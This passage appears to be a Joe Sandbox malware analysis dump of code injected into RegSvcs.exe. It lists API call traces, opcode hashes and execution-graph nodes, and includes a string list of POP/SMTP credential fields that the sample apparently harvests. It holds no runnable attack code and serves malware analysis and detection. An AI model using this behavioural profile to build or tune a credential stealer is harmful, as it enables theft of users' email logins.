                                              • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                              • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                              • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                              • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                              APIs
                                              • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                              • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                              • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                              • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                              APIs
                                              • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                              • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                              • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                              • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                              APIs
                                              • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseFind
                                              • String ID:
                                              • API String ID: 1863332320-0
                                              • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                              • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                              • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                              • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                              • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                              • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                              • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                              APIs
                                              • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                              • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                              • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                              • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                              APIs
                                              • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID:
                                              • API String ID: 1174141254-0
                                              • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                              • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                              • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                              • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                              APIs
                                              • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: closesocket
                                              • String ID:
                                              • API String ID: 2781271927-0
                                              • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                              • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                              • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                              • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                              APIs
                                              • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeVirtual
                                              • String ID:
                                              • API String ID: 1263568516-0
                                              • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                              • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                              • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                              • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                              APIs
                                              • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                              • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                              • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                              • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                              APIs
                                              • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                              • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                              • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                              • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                              APIs
                                              • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                              • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                              • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                              • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 0040438F
                                              • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                              • VariantInit.OLEAUT32(?), ref: 004043C4
                                              • SysAllocString.OLEAUT32(?), ref: 004043CD
                                              • VariantInit.OLEAUT32(?), ref: 00404414
                                              • SysAllocString.OLEAUT32(?), ref: 00404419
                                              • VariantInit.OLEAUT32(?), ref: 00404431
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InitVariant$AllocString$CreateInitializeInstance
                                              • String ID:
                                              • API String ID: 1312198159-0
                                              • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                              • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                              • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                              • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                              • API String ID: 0-2111798378
                                              • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                              • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                              • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                              • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                              • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                              • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                              • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

                                              Execution Graph

                                              Execution Coverage:1.4%
                                              Dynamic/Decrypted Code Coverage:2.7%
                                              Signature Coverage:5.3%
                                              Total number of Nodes:551
                                              Total number of Limit Nodes:71
                                              execution_graph 99388 41f0d0 99389 41f0db 99388->99389 99391 41b970 99388->99391 99392 41b996 99391->99392 99399 409d40 99392->99399 99394 41b9c3 99394->99389 99395 41b9a2 99395->99394 99407 40c1c0 99395->99407 99397 41b9b5 99443 41a6b0 99397->99443 99447 409c90 99399->99447 99401 409d4d 99402 409d54 99401->99402 99459 409c30 99401->99459 99402->99395 99408 40c1e5 99407->99408 99873 40b1c0 99408->99873 99410 40c23c 99877 40ae40 99410->99877 99412 40c4b3 99412->99397 99413 40c262 99413->99412 99886 4143a0 99413->99886 99415 40c2a7 99415->99412 99889 408a60 99415->99889 99417 40c2eb 99417->99412 99896 41a500 99417->99896 99421 40c341 99422 40c348 99421->99422 99908 41a010 99421->99908 99423 41bdc0 2 API calls 99422->99423 99425 40c355 99423->99425 99425->99397 99427 40c392 99428 41bdc0 2 API calls 99427->99428 99429 40c399 99428->99429 99429->99397 99430 40c3a2 99431 40f4a0 3 API calls 99430->99431 99432 40c416 99431->99432 99432->99422 99433 40c421 99432->99433 99434 41bdc0 2 API calls 99433->99434 99435 40c445 99434->99435 99913 41a060 99435->99913 99438 41a010 2 API calls 99439 40c480 99438->99439 99439->99412 99918 419e20 99439->99918 99442 41a6b0 2 API calls 99442->99412 99444 41a6cf ExitProcess 99443->99444 99445 41af60 LdrLoadDll 99443->99445 99445->99444 99479 418bc0 99447->99479 99451 409cb6 99451->99401 99452 409cac 99452->99451 99486 41b2b0 99452->99486 99454 409cf3 99454->99451 99497 409ab0 99454->99497 99456 409d13 99503 409620 LdrLoadDll 99456->99503 99458 409d25 99458->99401 99460 409c40 99459->99460 99847 41b5a0 99460->99847 99463 41b5a0 LdrLoadDll 99464 409c5b 99463->99464 99465 41b5a0 LdrLoadDll 99464->99465 99466 409c71 99465->99466 99467 40f180 99466->99467 99468 40f199 99467->99468 99855 40b040 99468->99855 99470 40f1ac 99859 41a1e0 99470->99859 99473 409d65 99473->99395 99475 40f1d2 99476 40f1fd 99475->99476 99866 41a260 99475->99866 99478 41a490 2 API calls 99476->99478 99478->99473 99480 418bcf 99479->99480 99504 414e50 99480->99504 99482 409ca3 99483 418a70 99482->99483 99510 41a600 99483->99510 99487 41b2c9 99486->99487 99517 414a50 99487->99517 99489 41b2e1 99490 41b2ea 99489->99490 99556 41b0f0 99489->99556 99490->99454 99492 41b2fe 99492->99490 99574 419f00 99492->99574 99825 407ea0 99497->99825 99499 409ad1 99499->99456 99500 409aca 99500->99499 99838 408160 99500->99838 99503->99458 99505 414e6a 99504->99505 99506 414e5e 99504->99506 99505->99482 99506->99505 99509 4152d0 LdrLoadDll 99506->99509 99508 414fbc 99508->99482 99509->99508 99511 418a85 99510->99511 99513 41af60 99510->99513 99511->99452 99514 41af70 99513->99514 99515 41af92 99513->99515 99516 414e50 LdrLoadDll 99514->99516 99515->99511 99516->99515 99518 414d85 99517->99518 99519 414a64 99517->99519 99518->99489 99519->99518 99582 419c50 99519->99582 99522 414b90 99585 41a360 99522->99585 99523 414b73 99643 41a460 LdrLoadDll 99523->99643 99526 414b7d 99526->99489 99527 414bb7 99528 41bdc0 2 API calls 99527->99528 99531 414bc3 99528->99531 99529 414d49 99530 41a490 2 API calls 99529->99530 99533 414d50 99530->99533 99531->99526 99531->99529 99532 414d5f 99531->99532 99536 414c52 99531->99536 99652 414790 LdrLoadDll NtReadFile NtClose 99532->99652 99533->99489 99535 414d72 99535->99489 99537 414cb9 99536->99537 99539 414c61 99536->99539 99537->99529 99538 414ccc 99537->99538 99645 41a2e0 99538->99645 99541 414c66 99539->99541 99542 414c7a 99539->99542 99644 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 99541->99644 99543 414c7f 99542->99543 99547 414c97 99542->99547 99589 4146f0 99543->99589 99547->99533 99601 414410 99547->99601 99549 414c70 99549->99489 99550 414c8d 99550->99489 99552 414d2c 99649 41a490 99552->99649 99553 414caf 99553->99489 99555 414d38 99555->99489 99557 41b101 99556->99557 99558 41b113 99557->99558 99670 41bd40 99557->99670 99558->99492 99560 41b134 99673 414070 99560->99673 99562 41b180 99562->99492 99563 41b157 99563->99562 99564 414070 3 API calls 99563->99564 99566 41b179 99564->99566 99566->99562 99698 415390 99566->99698 99567 41b20a 99569 41b21a 99567->99569 99792 41af00 LdrLoadDll 99567->99792 99708 41ad70 99569->99708 99571 41b248 99787 419ec0 99571->99787 99575 419f1c 99574->99575 99576 41af60 LdrLoadDll 99574->99576 99819 f42c0a 99575->99819 99576->99575 99577 419f37 99579 41bdc0 99577->99579 99822 41a670 99579->99822 99581 41b359 99581->99454 99583 414b44 99582->99583 99584 41af60 LdrLoadDll 99582->99584 99583->99522 99583->99523 99583->99526 99584->99583 99586 41a366 99585->99586 99587 41af60 LdrLoadDll 99586->99587 99588 41a37c NtCreateFile 99587->99588 99588->99527 99590 41470c 99589->99590 99591 41a2e0 LdrLoadDll 99590->99591 99592 41472d 99591->99592 99593 414734 99592->99593 99594 414748 99592->99594 99595 41a490 2 API calls 99593->99595 99596 41a490 2 API calls 99594->99596 99597 41473d 99595->99597 99598 414751 99596->99598 99597->99550 99653 41bfd0 LdrLoadDll RtlAllocateHeap 99598->99653 99600 41475c 99600->99550 99602 41445b 99601->99602 99604 41448e 99601->99604 99605 41a2e0 LdrLoadDll 99602->99605 99603 4145d9 99606 41a2e0 LdrLoadDll 99603->99606 99604->99603 99608 4144aa 99604->99608 99607 414476 99605->99607 99613 4145f4 99606->99613 99609 41a490 2 API calls 99607->99609 99610 41a2e0 LdrLoadDll 99608->99610 99611 41447f 99609->99611 99612 4144c5 99610->99612 99611->99553 99615 4144e1 99612->99615 99616 4144cc 99612->99616 99666 41a320 LdrLoadDll 99613->99666 99619 4144e6 99615->99619 99620 4144fc 99615->99620 99618 41a490 2 API calls 99616->99618 99617 41462e 99621 41a490 2 API calls 99617->99621 99622 4144d5 99618->99622 99623 41a490 2 API calls 99619->99623 99628 414501 99620->99628 99654 41bf90 99620->99654 99624 414639 99621->99624 99622->99553 99625 4144ef 99623->99625 99624->99553 99625->99553 99637 414513 99628->99637 99657 41a410 99628->99657 99629 414567 99630 41457e 99629->99630 99665 41a2a0 LdrLoadDll 99629->99665 99632 414585 99630->99632 99633 41459a 99630->99633 99635 41a490 2 API calls 99632->99635 99634 41a490 2 API calls 99633->99634 99636 4145a3 99634->99636 99635->99637 99638 4145cf 99636->99638 99660 41bb90 99636->99660 99637->99553 99638->99553 99640 4145ba 99641 41bdc0 2 API calls 99640->99641 99642 4145c3 99641->99642 99642->99553 99643->99526 99644->99549 99646 414d14 99645->99646 99647 41af60 LdrLoadDll 99645->99647 99648 41a320 LdrLoadDll 99646->99648 99647->99646 99648->99552 99650 41a4ac NtClose 99649->99650 99651 41af60 LdrLoadDll 99649->99651 99650->99555 99651->99650 99652->99535 99653->99600 99656 41bfa8 99654->99656 99667 41a630 99654->99667 99656->99628 99658 41a42c NtReadFile 99657->99658 99659 41af60 LdrLoadDll 99657->99659 99658->99629 99659->99658 99661 41bbb4 99660->99661 99662 41bb9d 99660->99662 99661->99640 99662->99661 99663 41bf90 2 API calls 99662->99663 99664 41bbcb 99663->99664 99664->99640 99665->99630 99666->99617 99668 41af60 LdrLoadDll 99667->99668 99669 41a64c RtlAllocateHeap 99668->99669 99669->99656 99793 41a540 99670->99793 99672 41bd6d 99672->99560 99674 414081 99673->99674 99676 414089 99673->99676 99674->99563 99675 41435c 99675->99563 99676->99675 99796 41cf30 99676->99796 99678 4140dd 99679 41cf30 2 API calls 99678->99679 99683 4140e8 99679->99683 99680 414136 99682 41cf30 2 API calls 99680->99682 99684 41414a 99682->99684 99683->99680 99801 41cfd0 99683->99801 99685 41cf30 2 API calls 99684->99685 99687 4141bd 99685->99687 99686 41cf30 2 API calls 99695 414205 99686->99695 99687->99686 99689 414334 99808 41cf90 LdrLoadDll RtlFreeHeap 99689->99808 99691 41433e 99809 41cf90 LdrLoadDll RtlFreeHeap 99691->99809 99693 414348 99810 41cf90 LdrLoadDll RtlFreeHeap 99693->99810 99807 41cf90 LdrLoadDll RtlFreeHeap 99695->99807 99696 414352 99811 41cf90 LdrLoadDll RtlFreeHeap 99696->99811 99699 4153a1 99698->99699 99700 414a50 8 API calls 99699->99700 99702 4153b7 99700->99702 99701 41540a 99701->99567 99702->99701 99703 4153f2 99702->99703 99704 415405 99702->99704 99705 41bdc0 2 API calls 99703->99705 99706 41bdc0 2 API calls 99704->99706 99707 4153f7 99705->99707 99706->99701 99707->99567 99812 41ac30 99708->99812 99711 41ac30 LdrLoadDll 99712 41ad8d 99711->99712 99713 41ac30 LdrLoadDll 99712->99713 99714 41ad96 99713->99714 99715 41ac30 LdrLoadDll 99714->99715 99716 41ad9f 99715->99716 99717 41ac30 LdrLoadDll 99716->99717 99718 41ada8 99717->99718 99719 41ac30 LdrLoadDll 99718->99719 99720 41adb1 99719->99720 99721 41ac30 LdrLoadDll 99720->99721 99722 41adbd 99721->99722 99723 41ac30 LdrLoadDll 99722->99723 99724 41adc6 99723->99724 99725 41ac30 LdrLoadDll 99724->99725 99726 41adcf 99725->99726 99727 41ac30 LdrLoadDll 99726->99727 99728 41add8 99727->99728 99729 41ac30 LdrLoadDll 99728->99729 99730 41ade1 99729->99730 99731 41ac30 LdrLoadDll 99730->99731 99732 41adea 99731->99732 99733 41ac30 LdrLoadDll 99732->99733 99734 41adf6 99733->99734 99735 41ac30 LdrLoadDll 99734->99735 99736 41adff 99735->99736 99737 41ac30 LdrLoadDll 99736->99737 99738 41ae08 99737->99738 99739 41ac30 LdrLoadDll 99738->99739 99740 41ae11 99739->99740 99741 41ac30 LdrLoadDll 99740->99741 99742 41ae1a 99741->99742 99743 41ac30 LdrLoadDll 99742->99743 99744 41ae23 99743->99744 99745 41ac30 LdrLoadDll 99744->99745 99746 41ae2f 99745->99746 99747 41ac30 LdrLoadDll 99746->99747 99748 41ae38 99747->99748 99749 41ac30 LdrLoadDll 99748->99749 99750 41ae41 99749->99750 99751 41ac30 LdrLoadDll 99750->99751 99752 41ae4a 99751->99752 99753 41ac30 LdrLoadDll 99752->99753 99754 41ae53 99753->99754 99755 41ac30 LdrLoadDll 99754->99755 99756 41ae5c 99755->99756 99757 41ac30 LdrLoadDll 99756->99757 99758 41ae68 99757->99758 99759 41ac30 LdrLoadDll 99758->99759 99760 41ae71 99759->99760 99761 41ac30 LdrLoadDll 99760->99761 99762 41ae7a 99761->99762 99763 41ac30 LdrLoadDll 99762->99763 99764 41ae83 99763->99764 99765 41ac30 LdrLoadDll 99764->99765 99766 41ae8c 99765->99766 99767 41ac30 LdrLoadDll 99766->99767 99768 41ae95 99767->99768 99769 41ac30 LdrLoadDll 99768->99769 99770 41aea1 99769->99770 99771 41ac30 LdrLoadDll 99770->99771 99772 41aeaa 99771->99772 99773 41ac30 LdrLoadDll 99772->99773 99774 41aeb3 99773->99774 99775 41ac30 LdrLoadDll 99774->99775 99776 41aebc 99775->99776 99777 41ac30 LdrLoadDll 99776->99777 99778 41aec5 99777->99778 99779 41ac30 LdrLoadDll 99778->99779 99780 41aece 99779->99780 99781 41ac30 LdrLoadDll 99780->99781 99782 41aeda 99781->99782 99783 41ac30 LdrLoadDll 99782->99783 99784 41aee3 99783->99784 99785 41ac30 LdrLoadDll 99784->99785 99786 41aeec 99785->99786 99786->99571 99788 41af60 LdrLoadDll 99787->99788 99789 419edc 99788->99789 99818 f42df0 LdrInitializeThunk 99789->99818 99790 419ef3 99790->99492 99792->99569 99794 41af60 LdrLoadDll 99793->99794 99795 41a55c NtAllocateVirtualMemory 99794->99795 99795->99672 99797 41cf40 99796->99797 99798 41cf46 99796->99798 99797->99678 99799 41bf90 2 API calls 99798->99799 99800 41cf6c 99799->99800 99800->99678 99802 41cff5 99801->99802 99803 41d02d 99801->99803 99804 41d00a 99802->99804 99805 41bf90 2 API calls 99802->99805 99803->99683 99806 41bdc0 2 API calls 99804->99806 99805->99804 99806->99803 99807->99689 99808->99691 99809->99693 99810->99696 99811->99675 99813 41ac4b 99812->99813 99814 414e50 LdrLoadDll 99813->99814 99815 41ac6b 99814->99815 99816 414e50 LdrLoadDll 99815->99816 99817 41ad17 99815->99817 99816->99817 99817->99711 99818->99790 99820 f42c11 99819->99820 99821 f42c1f LdrInitializeThunk 99819->99821 99820->99577 99821->99577 99823 41a68c RtlFreeHeap 99822->99823 99824 41af60 LdrLoadDll 99822->99824 99823->99581 99824->99823 99826 407eb0 99825->99826 99827 407eab 99825->99827 99828 41bd40 2 API calls 99826->99828 99827->99500 99831 407ed5 99828->99831 99829 407f38 99829->99500 99830 419ec0 2 API calls 99830->99831 99831->99829 99831->99830 99832 407f3e 99831->99832 99836 41bd40 2 API calls 99831->99836 99841 41a5c0 99831->99841 99834 407f64 99832->99834 99835 41a5c0 2 API calls 99832->99835 99834->99500 99837 407f55 99835->99837 99836->99831 99837->99500 99839 40817e 99838->99839 99840 41a5c0 2 API calls 99838->99840 99839->99456 99840->99839 99842 41af60 LdrLoadDll 99841->99842 99843 41a5dc 99842->99843 99846 f42c70 LdrInitializeThunk 99843->99846 99844 41a5f3 99844->99831 99846->99844 99848 41b5c3 99847->99848 99851 40acf0 99848->99851 99852 40ad14 99851->99852 99853 40ad50 LdrLoadDll 99852->99853 99854 409c4a 99852->99854 99853->99854 99854->99463 99856 40b063 99855->99856 99856->99856 99858 40b0e0 99856->99858 99871 419c90 LdrLoadDll 99856->99871 99858->99470 99860 41af60 LdrLoadDll 99859->99860 99861 40f1bb 99860->99861 99861->99473 99862 41a7d0 99861->99862 99863 41a7ef LookupPrivilegeValueW 99862->99863 99864 41af60 LdrLoadDll 99862->99864 99863->99475 99864->99863 99867 41a27c 99866->99867 99868 41af60 LdrLoadDll 99866->99868 99872 f42ea0 LdrInitializeThunk 99867->99872 99868->99867 99869 41a29b 99869->99476 99871->99858 99872->99869 99874 40b1f0 99873->99874 99875 40b040 LdrLoadDll 99874->99875 99876 40b204 99875->99876 99876->99410 99878 40ae51 99877->99878 99879 40ae4d 99877->99879 99880 40ae6a 99878->99880 99881 40ae9c 99878->99881 99879->99413 99923 419cd0 LdrLoadDll 99880->99923 99924 419cd0 LdrLoadDll 99881->99924 99883 40aead 99883->99413 99885 40ae8c 99885->99413 99887 4143c6 99886->99887 99888 40f4a0 3 API calls 99886->99888 99887->99415 99888->99887 99890 408a79 99889->99890 99925 4087a0 99889->99925 99892 408a9d 99890->99892 99893 4087a0 19 API calls 99890->99893 99892->99417 99894 408a8a 99893->99894 99894->99892 99943 40f710 10 API calls 99894->99943 99897 41af60 LdrLoadDll 99896->99897 99898 41a51c 99897->99898 100062 f42e80 LdrInitializeThunk 99898->100062 99899 40c322 99901 40f4a0 99899->99901 99902 40f4bd 99901->99902 100063 